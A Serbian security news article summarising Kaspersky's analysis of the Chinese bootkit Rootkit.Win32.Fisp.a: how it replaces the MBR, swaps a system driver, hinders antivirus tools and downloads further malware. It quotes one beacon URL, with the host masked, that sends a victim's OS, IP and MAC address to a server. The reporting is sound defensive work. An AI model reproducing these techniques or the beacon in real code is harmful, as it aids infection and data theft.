Novi kineski bootkit - Rootkit.Win32.Fisp.a
Opisi virusa, 12.04.2011, 09:27 AM

Kaspersky Laboratorija identifikovala je novi štetni program - bootkit, kernel mod rootkit-a koji za sada pogađa samo kineske internet korisnike.
Bootkit nazvan Rootkit.Win32.Fisp.a se distribuira pomoću downloader Trojanca (Trojan-Downloader.NSIS.Agent.jd) koji kompjutere korisnika inficira kada pokušaju da preuzmu video snimak sa kineskog pornografskog sajta.
Među fajlovima koji se preuzimaju pomoću downloader Trojanca nalazi se i dropper Rootkit.Win32.Fisp, štetni fajl koji inficira boot sektor hard diska.
Bootkit snima stari MBR (master boot record) u trećem sektoru i zamenjuje ga sopstvenim. Počev od četvrtog sektora, on instalira enkriptovani drajver i ostatak koda (klikni na sliku radi uvećanja):
Fragment sa početka hard diska zaražen bootkit-om: Rootkit.Win32.Fisp.a
Kada se kompjuter startuje, štetni kod se izvršava i ponovo vraća originalni MBR kako bi se Windows učitao bez opasnosti od otkrivanja bootkit-a.
Kada je određeni deo sistema pokrenut, bootkit presreće funkciju ExVerifySuite. On tada zamenjuje sistemski drajver fips.sys štetnim drajverom koji se nalazi zapisan na početku hard diska u enkriptovanom obliku. Drajver fips.sys nije neophodan kako bi sistem funkcionisao normalno, tako da neće doći do pada sistema kada se ovaj drajver zameni štetnim drajverom.
Drajver detektuje brojne antivirusne programe i ometa ih u onome što bi inače trebalo da rade. Između ostalih, to se dešava AV programima proizvođača TrendMicro, BitDefender, AVG, Symantec, Kasperksy Lab, ESET i nekolicini kineskih programa.
Drajver kompromituje explorer.exe proces i ubacuje u računar varijantu bootkit-a koja takođe ima funkciju downloader-a. Štetni program šalje zahteve ka serveru i prenosi podatke o zaraženom kompjuterskom operativnom sistemu, IP adesi, MAC adresi itd., što izgleda ovako:
http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=
none&g=none&k=a&h=62&i=2&j=0321-01
Između ostalog, rootkit kasnije preuzima Trojan-Dropper.Win32.Vedio.dgs i Trojan-GameThief.Win32, keylogger koji krade podatke korisičkih naloga online igrice LineAge2.
Šematski prikaz infekcije

Izdvojeno
Sa ChatGPT napravljen polimorfni malver

Istraživač HYAS instituta i stručnjak za sajber bezbednost, Džef Sims, razvio je novi malver koji pokreće ChatGPT pod nazivom Blackmamba. U janu... Dalje
Lažne aplikacije Telegram i WhatsApp prazne kripto novčanike

Trojanizovane verzije popularnih mesindžera kao što je Telegram ili WhatsApp nude se na lažnim sajtovima korisnicima Androida i Windowsa, koji preu... Dalje
BlackLotus je prvi malver koji može da zaobiđe Secure Boot na Windows 11

Nevidiljivi UEFI (Unified Extensible Firmware Interface) bootkit pod nazivom BlackLotus postao je prvi poznati malver koji je u stanju da zaobiđe Sec... Dalje
Piratski programi za macOS inficiraju računare opasnim kripto malverom

Final Cut Pro i druge piratske macOS aplikacije na Pirate Bay su inficirane do sada neotkrivenim malverom. Kada ih žrtve preuzmu, zaraženi Apple ure... Dalje
Opasni ransomware Clop sada inficira i Linux sisteme
.jpg)
Istraživači iz firme SentinelOne 26. decembra primetili su prvu varijantu ransomwarea Clop (Cl0p) koja cilja na Linux sisteme. Clop se prvi put poja... Dalje
Pratite nas
Nagrade